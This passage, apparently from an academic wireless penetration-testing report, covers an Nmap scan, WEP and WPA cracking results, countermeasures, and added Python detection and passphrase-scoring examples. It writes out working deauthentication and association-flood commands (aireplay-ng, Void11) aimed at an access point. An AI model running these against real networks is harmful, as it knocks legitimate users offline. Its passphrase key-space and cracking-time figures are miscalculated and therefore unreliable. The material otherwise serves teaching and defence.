In this lab the goal was to use enumeration tools, address the most common
configuration flaws, and deploy denial of service (DoS) and man-in-the-middle (MITM)
attacks. The layout of this lab is:
Figure 3.11 Network Layout
3.2.1 Enumeration Attacks
The first tool used was Nmap, and the command used was:
nmap -T -sV -v -O 192.168.1.1-254
• -T sets the timing and performance template; higher values are faster.
• -sV probes open ports to determine the service and version running on them.
• -v increases the verbosity level, causing Nmap to print more information about
the scan in progress.
• -O enables OS detection.
Figure 3.11 shows Nmap running.
Figure 3.11 Nmap executing
On the left-hand side of the window, Nmap displays all the devices that belong to the
wireless network and were live at the time of the scan. Table 3.1 summarizes the Nmap
results.
Table 3.1 Nmap Results
IP Address      MAC Address         Card Brand      Ports Open             OS
192.168.1.1     00:12:17:9E:85:C8   Cisco-Linksys   80                     Router
192.168.1.101   00:14:22:4A:FC:20   Dell            135, 139, 445          Windows
192.168.1.102   00:18:E7:1D:EF:CD   Cameo           135, 139, 3389         Windows
192.168.1.106   00:14:22:4A:CF:6E   Dell            135, 139, 445          Windows
192.168.1.107   00:01:03:1C:A3:89   3com            22, 111, 933           Linux
192.168.1.108   00:01:03:1C:A3:B4   3com            22, 631                Linux
192.168.1.109   00:01:03:1C:B5:0C   3com            135, 139, 445, 1025    Windows
192.168.1.111   00:01:03:1C:B5:0C   3com            None                   None
By default, Nmap 4.20 on Backtrack scans 1,697 ports for common services. This will
catch most open TCP ports. However, system administrators sometimes run services on
uncommon ports, practicing security through obscurity. Without scanning those uncommon
ports, the penetration tester may miss these services. To make Nmap scan all ports, the
-p0-65535 option is used; however, this type of scan takes a long time. All this
information is used to exploit vulnerabilities in the services or ports. It is out of the scope
of this project to exploit vulnerabilities in open ports or services with default
configurations.
However, in order to prevent hackers from exploiting vulnerabilities, there are several
tools that allow the system administrator to assess the security of all the stations
connected to the network. One of the most common is GFI LANguard Network Security
Scanner. This tool checks databases based on OVAL and the SANS Top 20, providing
over 15,000 vulnerability assessments when the network is scanned. LANguard also gives
the penetration tester the information and tools needed to perform multi-platform scans
across all environments. The goal is to analyze the network's security health and to
install and manage patches effectively on all stations across different operating systems
[Bayles 2007].
3.2.2 Denial of Service Attacks
As mentioned before, wireless networks are very vulnerable to this type of attack, mainly
for two reasons. The first is the lack of frame authentication in 802.11 management
frames such as beacons, association requests, and probe responses. The functionality
inherent in the MAC layer of an 802.11 network allows wireless systems to discover,
join, and roam freely on the network, completely exposed to the elements. This implicit
trust among wireless devices makes it easy for an attacker to bring down individual
hosts, or even an entire wireless network [Bellardo 2003].
There are many different types of denial of service (DoS) attacks, which can impact
radio signals, network protocols, and even wireless applications. The attacks performed
in this project were the deauthentication and the authentication attacks. A deauthentication
attack puts the client in a state of complete disconnection. The tool used was Aireplay-ng.
The command line used:
aireplay-ng -0 0 -a 00:12:17:9E:85:C7 wifi0
• -0 specifies the deauthentication attack.
• 0 is the number of deauthentication packets to send; 0 means continuous.
• -a is the MAC address of the access point.
• -c is the MAC address of the client to deauthenticate; if omitted, all clients are
deauthenticated.
• wifi0 is the interface.
All the stations connected to the access point were deauthenticated, and because
aireplay-ng continued to send deauthentication packets no one was able to reconnect to
the access point. The second attack exploits a weakness in the way access points queue
incoming client requests. These requests are stored in the client association identifier
(AID) table. The AID table can only handle a limited number of wireless client
connections; once this memory is filled, most APs will no longer accept incoming
association requests. One of the most common tools for creating an association flooding
attack is Void11.
The command used was:
void11_penetration wifi0 -D -s 3 -s -S testnetwork -B 00:12:17:9E:85:C7
• wifi0 is the interface.
• -s selects the association flood attack.
• -S is the SSID of the access point.
• -B is the BSSID of the access point.
This attack overloaded the AID table within seconds, causing the AP to freeze.
4. EVALUATION AND RESULTS
Once the penetration testing has finished, the next step is to report the findings to all
interested parties, such as the network administrator and management. The reporting
phase is as important as the testing itself. Writing a good report requires a great deal of
effort; sometimes it takes three times as long as the testing work itself. The report shows
the completeness and rigor of the pen-tester's testing methodology. The report should
include the following sections [Bayles 2007]:
• Executive Summary
• In-Scope and Out-of-Scope Statements
• Objectives
• Nature of Testing
• Analysis
• Summary of Findings and Vulnerability Summary
• Countermeasure(s) to Control the Vulnerability
• Conclusion
• Supporting Documentation
Many organizations make the major mistake of not following up swiftly. It is one thing
to identify vulnerabilities; it is another thing altogether to fix the problem. Companies are
in a worse legal position if they do not fix known problems than if they do not know
about the problems at all. Furthermore, if companies delay the follow-up, they also risk
wasting the money and time spent on the test itself [Bayles 2007].
4.1 External pen-test lab
4.1.1 First Scenario
The first vulnerability found was the rogue access point (AP) discovered with no
security. The access point was connected to the main wired network, creating a back door
for any malicious hacker. Furthermore, the AP made all the other security measures
useless. Most of the time there is a policy or rule that prohibits connecting any device
without the consent of the security manager; however, it is not only a matter of
establishing a policy: there have to be controls to ensure that the policy is being followed
by all employees. Security is not only the security manager's concern; it involves every
employee in the company. It has been reported that the majority of successful attacks
were due to the human factor. The countermeasures to avoid and eliminate this
vulnerability are [Bayles 2007]:
• Using active and passive scanner tools to identify possible illegal access points.
• Keeping employees informed about the security issues of new technology.
As demonstrated, hiding the SSID of the access point is not an effective security
measure. Using tools such as Kismet or Airodump-ng, a malicious hacker can easily find
the access point.
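The first countermeasure above, scanner output reconciled against an inventory of authorized access points, as an added Python example that is not part of the original project. It parses constructed Kismet-style records (the fields the text reads off the Network Details screen); the inventory, the SSID names and the second authorized BSSID are assumed values, while the OUI vendors are the ones the text reports for its lab hardware.

```python
import csv
import io

# Constructed scan export in a Kismet-style CSV layout (not real Kismet output);
# the columns are the Network Details fields the text reads off the screen.
SCAN_CSV = """bssid,ssid,channel,encryption,max_rate,cloaked
00:0F:66:DF:87:45,testnetwork,6,None,11.0,no
00:12:17:9E:85:C7,corpnet,11,WPA-PSK,54.0,no
00:0F:66:AA:BB:CC,,6,None,11.0,yes
00:12:17:9E:85:C8,corpguest,1,WEP,11.0,no
"""

# Assumed authorised-AP inventory; the SSID names and the role of the second
# BSSID are hypothetical values for this example.
AUTHORISED_BSSIDS = {"00:12:17:9E:85:C7", "00:12:17:9E:85:C8"}

# OUI prefixes and vendors exactly as the text reports them for its lab hardware.
OUI_VENDORS = {"00:0F:66": "Linksys", "00:12:17": "Cisco-Linksys"}


def vendor_of(bssid):
    """Vendor lookup on the first three octets (the OUI) of a BSSID."""
    return OUI_VENDORS.get(bssid.upper()[:8], "unknown")


def likely_standard(max_rate):
    """The text's rule of thumb: an 11 Mbps maximum rate means an 802.11b AP."""
    return "802.11b" if float(max_rate) <= 11.0 else "802.11a/g or later"


def parse_scan(text):
    """Parse the CSV export into one dict per access point."""
    return list(csv.DictReader(io.StringIO(text)))


def assess_ap(rec, authorised):
    """Findings for one AP record: not in inventory, hidden SSID, weak or no encryption."""
    findings = []
    if rec["bssid"].upper() not in authorised:
        findings.append("rogue: BSSID not in the AP inventory")
    if rec["cloaked"] == "yes" or not rec["ssid"]:
        findings.append("hidden SSID: not a security control, AP is still discoverable")
    if rec["encryption"] == "None":
        findings.append("open: no encryption, direct path onto the wired network")
    elif rec["encryption"] == "WEP":
        findings.append("WEP: recoverable from a few thousand captured IVs")
    return findings


def triage(text, authorised=AUTHORISED_BSSIDS):
    """Map each BSSID with findings to (vendor, likely standard, findings).
    APs that are in the inventory and use WPA produce no entry."""
    report = {}
    for rec in parse_scan(text):
        findings = assess_ap(rec, authorised)
        if findings:
            report[rec["bssid"].upper()] = (vendor_of(rec["bssid"]),
                                            likely_standard(rec["max_rate"]),
                                            findings)
    return report


if __name__ == "__main__":
    for bssid, (vendor, std, findings) in triage(SCAN_CSV).items():
        print(bssid, vendor, std)
        for f in findings:
            print("   -", f)
```

Run against a real Kismet CSV export the vendor table would come from the IEEE OUI list and the inventory from the company's hardware list, as the text describes.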
4.1.2 Second Scenario
In the second scenario the vulnerability found was the use of the WEP encryption
method, which was easily broken. Table 4.1 shows the amount of time and the number
of packets needed to crack both 64-bit and 128-bit WEP.
Table 4.1 Cracking WEP
WEP (bits)   Number of Packets   Time to Decrypt (sec)
64           15,000              5
128          70,000              10
Having tools to inject packets into a wireless network makes the process of cracking
WEP even easier for malicious hackers. They do not need to wait until associated users
generate the number of packets needed to crack WEP; they can generate the traffic
themselves and crack the encryption within seconds. The countermeasures to this
vulnerability are [Bayles 2007]:
• Not using the WEP encryption method anymore; more secure methods are available.
• Using a wireless intrusion detection system (WIDS) to monitor the air space and
detect when a malicious hacker is injecting packets.
Wireless intrusion detection systems in their simplest form are designed and built to
monitor and report on network activity, or packets, between communicating devices. The
most common WIDS are AirMagnet Distributed 4.0, AirDefense Enterprise V4.1 and
Red-M's set of products. AirMagnet sensors report network performance information
and alerts to a management server backed by a SQL database, which is monitored through
a management console. One of its most important features is the ability to identify and
assign aliases to the various wireless MACs, making it easier to tell actual users from
illegal users. By using the Find tool the security manager can manually and physically
track down the location of a rogue user. Furthermore, AirMagnet will even pick up DoS
attacks as they happen. Administrators can disable a site and re-address it, and if the
attacker is nearby, potentially track him down [Broadcom 2006].
The AirDefense system consists of a server running Linux with distributed wireless AP
sensors and a Java-based web console. AirDefense's strong suit is its policy-based
approach to monitoring wireless devices and traffic. There are four main categories of
policies: configuration, performance, vendor, and channel. All of the policy thresholds
are configurable. For instance, if the company allows only Cisco NICs, then all other
NICs could be excluded so that a non-Cisco NIC would immediately trip an alarm
[Broadcom 2006].
The Red-M set of wireless security products includes Red-Alert and Red-Vision.
Red-Alert is a standalone wireless probe which can detect unauthorized 802.11a/b/g
networks. Red-Vision has three components. The Red-Vision Server is the heart of
Red-Vision and contains both the intra-process communications engine and the internal
standards-compliant database. The Red-Vision Laptop Client is the agent installed on
every laptop computer connected to the wireless network; it collects data from the end
user and also monitors hardware use. The Red-Vision Viewer is a geography-based
interface, which is unique in that no other wireless software product offers the wireless
network administrator this much control. The Red-Vision Viewer also provides control
over every separate device, appliance or hardware type that connects to the network, no
matter how many different pieces of equipment make up the wireless environment
[Broadcom 2006].
4.1.3 Third Scenario
In the third scenario the vulnerability found was the use of an eight-character
passphrase to generate the WPA/WPA2 key. It was possible to crack the WPA/WPA2
encryption because the passphrase was too short. Consider instead a passphrase twenty
characters long drawn from alphanumeric values only (62 characters): a brute force
attack would have to try 104,857,600,000,000,000,000,000 candidates. If coWPAtty can
only try 60 words per second, it would take 55,416,878,065,279,891 years to try all
possible words. WPA/WPA2-PSK is a good choice for SOHO environments; as shown, it
is computationally infeasible to crack this encryption method when long passphrases are
used. For enterprises the best option is WPA-RADIUS, which has not been cracked yet.
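The key-space reasoning of Sections 3.1.2 and 4.1.3, as an added Python example that is not the project's own code: it computes the candidate space and the time to exhaust it at coWPAtty's 60 guesses per second, and scores a candidate passphrase against a constructed wordlist and the length and character-class policy the conclusion recommends. The wordlist, the guess rate and the sample passphrases are constructed or assumed values.

```python
import string

SECONDS_PER_YEAR = 365.25 * 24 * 3600
COWPATTY_RATE = 60          # guesses per second, the upper figure the text gives

# Constructed miniature wordlist standing in for the text's password.txt.
WORDLIST = {"password", "testnetwork", "letmein", "linksys", "wireless"}


def charset_size(passphrase):
    """Size of the smallest standard alphabet covering the passphrase: lower 26,
    upper 26, digits 10, punctuation 32 (so alphanumerics give the text's 62)."""
    size = 0
    if any(c.islower() for c in passphrase):
        size += 26
    if any(c.isupper() for c in passphrase):
        size += 26
    if any(c.isdigit() for c in passphrase):
        size += 10
    if any(c in string.punctuation for c in passphrase):
        size += len(string.punctuation)
    return size


def keyspace(charset, length):
    """Number of candidates an exhaustive attack must consider."""
    return charset ** length


def years_to_exhaust(space, guesses_per_second=COWPATTY_RATE):
    """Wall-clock years to try every candidate at a fixed guess rate."""
    return space / guesses_per_second / SECONDS_PER_YEAR


def assess_passphrase(passphrase, wordlist=WORDLIST, guesses_per_second=COWPATTY_RATE):
    """Score a WPA-PSK passphrase against the dictionary and brute force attacks
    the text describes, and against the recommended policy (20+ characters,
    upper case, special characters, not a dictionary word)."""
    in_dictionary = passphrase.lower() in wordlist
    space = keyspace(charset_size(passphrase), len(passphrase))
    has_upper = any(c.isupper() for c in passphrase)
    has_special = any(c in string.punctuation for c in passphrase)
    return {
        "length": len(passphrase),
        "charset": charset_size(passphrase),
        "keyspace": space,
        "brute_force_years": years_to_exhaust(space, guesses_per_second),
        "dictionary_hit": in_dictionary,   # found at once, whatever the key space
        "meets_policy": (len(passphrase) >= 20 and has_upper and has_special
                         and not in_dictionary),
    }


if __name__ == "__main__":
    # The text's own case: eight alphanumerics, 62^8 = 218,340,105,584,896 candidates.
    print(keyspace(62, 8), round(years_to_exhaust(keyspace(62, 8))), "years at 60/s")
    for p in ("password", "Abcdefg1", "Correct!Horse9Battery&Staple"):
        print(p, assess_passphrase(p))
```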
4.2 Internal Pen-Test lab
4.2.1 Vulnerability Assessment
In order to detect and eliminate possible vulnerabilities there exist tools such as Nessus.
Nessus is proprietary, comprehensive vulnerability scanning software. Its goal is to detect
potential vulnerabilities on the tested system. For example:
• Vulnerabilities that allow a remote attacker to control or access sensitive data on a
system.
• Misconfigurations such as an open mail relay or missing patches.
• Default passwords, and blank or absent passwords on system accounts.
The stations used in this lab did not have many services or ports open, because none of
them were servers. Still, one of the most important rules for hardening a host system is
the concept of minimization: only essential applications and operating system
components should be loaded on host systems. Software vulnerabilities account for a
large percentage of the security incidents that occur, so less software on a host generally
equates to less exploitation of software vulnerabilities. Another common rule is the
isolation of services. It is best to isolate services such as email, www, and ftp on separate
physical systems. This way, if a service is exploited by an intruder, the potential impact
on the other critical services is limited [CERT 2003].
4.2.2 Denial of Service Attacks
There are several steps a security manager can take to protect the systems from DoS
attacks. Many of these are free and relatively simple. It is important to determine what is
normal in the wireless network. For example [Beaver 2005]:
• Protocols in use
• Minimum, maximum, and average number of connections
• Minimum, maximum, and average throughput
• RF signal strength
• Any notable RF interference
• Number of Users
This information is invaluable when a security manager is trying to determine
whether a Denial of Service attack is about to occur, is occurring, or has already
occurred.
Another tool to prevent or detect DoS attacks is a wireless intrusion detection system
(WIDS). A WIDS looks for [Beaver 2005]:
• Unauthorized MAC addresses
• Unauthorized broadcast traffic
• Jamming
• Association floods
• Authentication floods
• Disassociation attacks
• Deauthentication attacks
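The association-flood and deauthentication-attack items of this list, as an added Python detection sketch that is not part of the original project. It runs two sliding-window checks over a constructed log of 802.11 management-frame events shaped like the lab's continuous aireplay-ng -0 run and the Void11 association flood; the thresholds, timestamps and client MACs are assumed values, and the BSSID is the lab access point's.

```python
from collections import defaultdict

DEAUTH = "deauth"
ASSOC_REQ = "assoc-req"
AP_BSSID = "00:12:17:9E:85:C7"  # the lab access point's BSSID from the text


def build_sample_events():
    """Constructed management-frame log: (timestamp_s, subtype, source MAC, BSSID).
    Not a real capture; shaped like the two DoS attacks run in the lab."""
    events = [
        (0.0, ASSOC_REQ, "00:18:E7:1D:EF:CD", AP_BSSID),   # normal association
        (5.0, ASSOC_REQ, "00:14:22:4A:FC:20", AP_BSSID),   # normal association
    ]
    # Deauthentication flood: 40 deauth frames carrying the AP's address as
    # source inside 2 s, which is what a continuous deauth run looks like on air.
    for i in range(40):
        events.append((10.0 + i * 0.05, DEAUTH, AP_BSSID, AP_BSSID))
    # Association flood: 60 association requests from 60 never-seen client MACs
    # inside 3 s, which is what filling the AID table looks like on air.
    for i in range(60):
        events.append((20.0 + i * 0.05, ASSOC_REQ, f"02:00:00:00:00:{i:02X}", AP_BSSID))
    return sorted(events)


def peak_frame_count(times, window):
    """Largest number of frames inside any sliding window of `window` seconds."""
    times = sorted(times)
    best = j = 0
    for i, t in enumerate(times):
        while t - times[j] > window:
            j += 1
        best = max(best, i - j + 1)
    return best


def peak_distinct_sources(items, window):
    """Largest number of distinct source MACs inside any sliding window of
    `window` seconds; `items` is a list of (timestamp, source MAC)."""
    items = sorted(items)
    live = defaultdict(int)
    best = j = 0
    for i, (t, src) in enumerate(items):
        live[src] += 1
        while t - items[j][0] > window:
            old = items[j][1]
            live[old] -= 1
            if live[old] == 0:
                del live[old]
            j += 1
        best = max(best, len(live))
    return best


def detect_deauth_floods(events, window=1.0, threshold=10):
    """BSSIDs whose deauthentication rate reached `threshold` frames per `window` s.
    A legitimate AP sends deauth frames rarely, so a burst is a strong signal."""
    per_bssid = defaultdict(list)
    for ts, subtype, _src, bssid in events:
        if subtype == DEAUTH:
            per_bssid[bssid].append(ts)
    return {b: peak_frame_count(ts, window) for b, ts in per_bssid.items()
            if peak_frame_count(ts, window) >= threshold}


def detect_assoc_floods(events, window=5.0, threshold=20):
    """BSSIDs that saw at least `threshold` distinct associating clients per `window` s."""
    per_bssid = defaultdict(list)
    for ts, subtype, src, bssid in events:
        if subtype == ASSOC_REQ:
            per_bssid[bssid].append((ts, src))
    return {b: peak_distinct_sources(items, window) for b, items in per_bssid.items()
            if peak_distinct_sources(items, window) >= threshold}


if __name__ == "__main__":
    events = build_sample_events()
    print("deauth floods:", detect_deauth_floods(events))
    print("association floods:", detect_assoc_floods(events))
```

The thresholds are where the baseline the text asks for (normal connection counts and rates) comes in: set them from the measured norm rather than from these constructed values.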
5. FUTURE WORK
Security threats are an ever-increasing problem for modern computing infrastructures.
Attempts to characterize the security of a large networked system are the focus of several
ongoing research efforts. One approach is to perform penetration testing of an actual
system manually by red teams. Such an approach generates only one of what may be
many attack paths through a system [Broadcom 2006]. Current security practice focuses
only on specifics, such as firewall testing, web server testing, and so on. The other
approach is to create a formal model of the system and then obtain comprehensive
security metrics by analyzing the model. The most common methodology used by
pen-testers is the Open-Source Security Testing Methodology Manual (OSSTMM) 2.1
created by Pete Herzog. However, this methodology does not encompass all the security
issues related to wireless networks, since it is intended as a guide for wired networks
[Beaver 2005]. Thus, research in this field is needed to produce a generic model that can
serve as a basic guideline when doing wireless penetration testing.
Another field of research is wireless intrusion detection systems, which are a
countermeasure to all the security flaws in wireless networks explained above. To be
effective, a WIDS must run online, in real time: although offline or after-the-event IDSs
are useful as an audit trail, that type of IDS will not prevent an attack from taking place.
A real-time IDS needs to be able to stream data across a network from sensors to a
central point where it can be stored and analyzed. This additional network traffic running
concurrently can significantly impact network performance, so sufficient bandwidth is a
prerequisite [Broadcom 2006].
Furthermore, today's wireless intrusion detection systems, such as AirDefense Guard or
AirMagnet Distributed, use a misuse (signature-based) IDS, which has the drawback of
being only as good as the signature files and known-attack pattern-recognition files given
to them. The problem is that a wireless network using such a tool is protected only
against what are known to be attacks; a new attack will be the one that gets through. This
underlines the need for an efficient mechanism to keep all network security components
with rule- or signature-based tables up to date [Broadcom 2006].
Another field of research is the use of neural networks in wireless intrusion detection
systems, since a neural network is a solution to the problem of determining what normal
traffic is. A neural network is a mathematical model inspired by biological neural
networks. Neural networks can be used to model complex relationships between inputs
and outputs or to find patterns in data. One of their biggest advantages is the ability to
learn.
6. CONCLUSION
With the emergence of network globalization and the advent of the Internet as the major
tool for international information exchange and the platform for the future, security has
become one of the most talked-about topics. It is clear that wireless solutions are
transforming the way people work and live. Using wireless-enabled devices, it is already
possible to access the Internet from public areas such as coffee shops, hotels and
motorway rest stops. All of this is possible through the use of Wireless Local Area
Networks (WLANs). Large businesses are starting to wake up to the productivity benefits
and cost advantages of WLANs. Furthermore, the development of affordable products and
services has allowed small to medium businesses to invest in the deployment of WLANs.
As with all networks, wired or wireless, the security threats are numerous, but with a
WLAN the security manager has to look at these threats in a different way. The physical
medium over which wireless networks transport data is like having network cables
running outside the perimeter of the building. The bottom line is that wireless
networking, as a new technology, needs new security controls to secure it. Wireless
penetration testing is a new methodology for addressing the security of 802.11 wireless
LANs.
Wireless penetration testing has been determined to be the most effective way to find
exploits and to prove whether a system is vulnerable. It also often allows the security
analyst to find new vulnerabilities. Penetration testing should play a role in every
company's network security policy. It gives a bird's-eye perspective on current security.
It also helps to identify what information is exposed to the public or to the Internet at
large. By constructing attack scenarios that closely model all possible situations, wireless
penetration testing helps to identify and narrow down security risks. Furthermore, it helps
to identify overlooked areas in terms of security and allows customers to improve their
current systems.
The results of the wireless penetration tests have demonstrated that one of the major
security flaws in wireless networks is the use of the Wired Equivalent Privacy (WEP)
encryption method. It has been shown that this encryption method is easily cracked with
tools such as Aircrack-ng and WEPcrack: it is only a matter of gathering a few thousand
packets, and these tools will crack the WEP key within seconds. Also, if there is not much
traffic being generated, tools such as Aireplay-ng and Packetforge-ng can generate and
inject packets so that the access point produces the number of IVs necessary to crack the
WEP key.
Even worse, there are still many access points with no encryption method in place at all.
Hiding the SSID cannot be considered a security measure either, because there are tools
that can gather information about the access point even when it is not broadcasting its
SSID. Nor is MAC address filtering a security measure, since, as already shown, tools
such as Airodump-ng, Kismet and Wireshark can easily obtain the MAC addresses of
authorized users.
A solution for SOHO users to the encryption problem is the use of WPA with a
passphrase of twenty characters or longer. The passphrase should include special
characters and upper-case characters, and should not be a typical word that can be found
in a dictionary. A solution for large enterprises is the use of WPA-RADIUS. This
technology has proven to be secure, and so far no exploit has been found.
Finally, a security measure for detecting attacks such as enumeration, denial of service,
and man-in-the-middle is a wireless intrusion detection system (WIDS). Knowing what is
normal is crucial. Every security manager should gather from the wireless network at
least the protocols in use, the minimum, maximum and average number of connections,
the average throughput, and the number of users. This information is the baseline for
understanding what is right and what is wrong in the wireless network. WIDS technology
is moving toward the use of neural networks and fuzzy logic to define what normal traffic
is and to defend the wireless network from new types of intrusion.
In conclusion, penetration testing is a good method for finding holes and security flaws
in all systems of an organization. However, organizations should always be aware of the
limitations of penetration testing. The results of a test only provide a snapshot of a
system's security at a given time, and they are only as good as the tester conducting it.
New vulnerabilities appear frequently, so regular testing needs to be undertaken.
BIBLIOGRAPHY AND REFERENCES
[Arbaugh 2003] Arbaugh, W.A., "Wireless Security Is Different," IEEE Computer, vol. 36,
no. 8, Aug. 2003, pp. 99–101.
[Arbaugh-Shankar 2001] Arbaugh, W.A., Shankar, N., and Wang, J., "Your 802.11 Network
Has No Clothes," Proc. 1st IEEE Int'l Conf. Wireless LANs and Home Networks, IEEE
Press, 2001, pp. 131–134.
[Bayles 2007] Bayles, A., Butler, K., and Collins, A., Penetration Tester's Open Source
Toolkit. Syngress Publishing, 2007.
[Beaver 2005] Beaver, K. and Davis, P., Hacking Wireless Networks for Dummies. Wiley
Publishing, Inc., 2005.
[Bellardo 2003] Bellardo, J. and Savage, S., "802.11 Denial-of-Service Attacks: Real
Vulnerabilities and Practical Solutions," Proc. 12th USENIX Security Symp., USENIX
Assoc., 2003, pp. 15–28.
[Broadcom 2006] Broadcom Corporation, 802.11n: Next-Generation Wireless LAN
Technology. Available from www.broadcom.com/docs/WLAN/802_11n-WP100-R.pdf
[Cam-Winget 2003] Cam-Winget, N., "Security Flaws in 802.11 Data Link Protocols,"
Comm. ACM, vol. 46, May 2003, pp. 35–39.
[CERT 2003] CERT/CC Training and Education Center, Advanced Information
Assurance. November 2003, pp. 14–50.
[Chinitz 2007] Chinitz, L., Interference Immunity of 2.4 GHz Wireless LANs. Available
from http://www.hometoys.com/htinews/aug01/articles/immunity/immunity.htm (visited
August 2008).
[Hassell 2004] Hassell, J., Wireless Attacks and Penetration Testing. Available from
www.securityfocus.com/infocus/1785 (visited March 2, 2008).
[Housley 2003] Housley, R. and Arbaugh, W., "Security Problems in 802.11-based
Networks," Comm. ACM, vol. 46, no. 5, 2003, pp. 31–34.
[Hurley 2007] Hurley, C. and Thornton, F., WarDriving & Wireless Penetration Testing.
Syngress Publishing, Inc., 2007.
[INSIGHT 2008] Insight Consulting. Home page. Available from www.insight.co.uk/
(visited March 27, 2008).
[ISS 2008] Internet Security Systems, Penetration Tests: The Baseline for Effective
Information Protection. Available from
http://ww.iss.net/documents/whitepapers/pentestwp.pdf, pp. 2–4.
[Kowalski 2006] Kowalski, M.B., Bertolino, K.D., and Basagni, S., "Hack Boston:
Monitoring Wireless Security Awareness in an Urban Setting," Canadian Conference on
Electrical and Computer Engineering (CCECE '06), May 2006, pp. 1308–1311.
[Kruse 2002] Kruse, W. and Heiser, J. Computer Forensics: Incident Response
Essentials. Addison-Wesley, Lucent Technologies, 2002.
[Miller 2001] Miller S.K., “Facing the Challenge of Wireless Security.” IEEE Computer
Volume: 34, Issue: 7 pp. 16 – 18. July 2001
[Nichols 2002] Nichols, R and Lekkas, P. Wireless Security. Mcgraw-Hill, 2002.
[Puneet 2008] Puneet M. Guide to Penetration Testing. Available from
http://searchnetworking.techtarget.com/general/0,295582,sid7_gci1083719,00.html
(visited May 2, 2008).
[Stephen 2006] Stephen, N and Shenk, J. Penetration Testing: Assessing Your Overall
Security Before Attackers Do. SANS Analyst Program.
[Siles 2007] Siles, R. Wireless forensics: Tapping the Air I. Home Page. Available from
www.securityfocus.com/infocus/1884 (visited Feb. 22, 2008).
96
[Siles 2007] Siles, R. Wireless forensics: Tapping the Air II. Home Page. Available from
www.securityfocus.com/infocus/1885 (visited Feb. 22, 2008).
[Tamini 2006] Tamimi A. Security in Wireless Data Networks: A Survey Paper.
Available from http://www.cs.wustl.edu/~jain/cse574-06/ftp/wireless_security/index.html
(visited September 2008).
[Turnbull 2007] Turnbull B. and Slay J. Wireless Forensic Analysis Tools for use in
Electronic Evidence Collection. IEEE Comput. (Feb 2007).
[VAC 2008] Vulnerability Assesment Co. Home Page. Available from
www.vulnerabilityassessment.co.uk/ (visited March. 5, 2008)
[Vladimirov 2004] Vladimirov, A. and Gavrilenko, K. Wi-Foo: The secret of Wireless
Hacking. Addison-Wesley, Pearson education. 2004.
[Walker 2000] Walker J.R., Unsafe at Any Key Size: An Analysis of the WEP
Encapsulation, IEEE 802.11 Task Group E IEEE 802.11/00-362, Oct. 2000,
http://grouper.ieee.org/groups/802/11/Documents/DocumentHolder/0-362.zip. (visited
May 12, 2008
[WildPackets 2008] Wild Packets Inc. 802.11 WLAN Packets and Protocols. Available
from http://www.wildpackets.com/support/compendium/manual_appendices/overview
(Visited August 2008).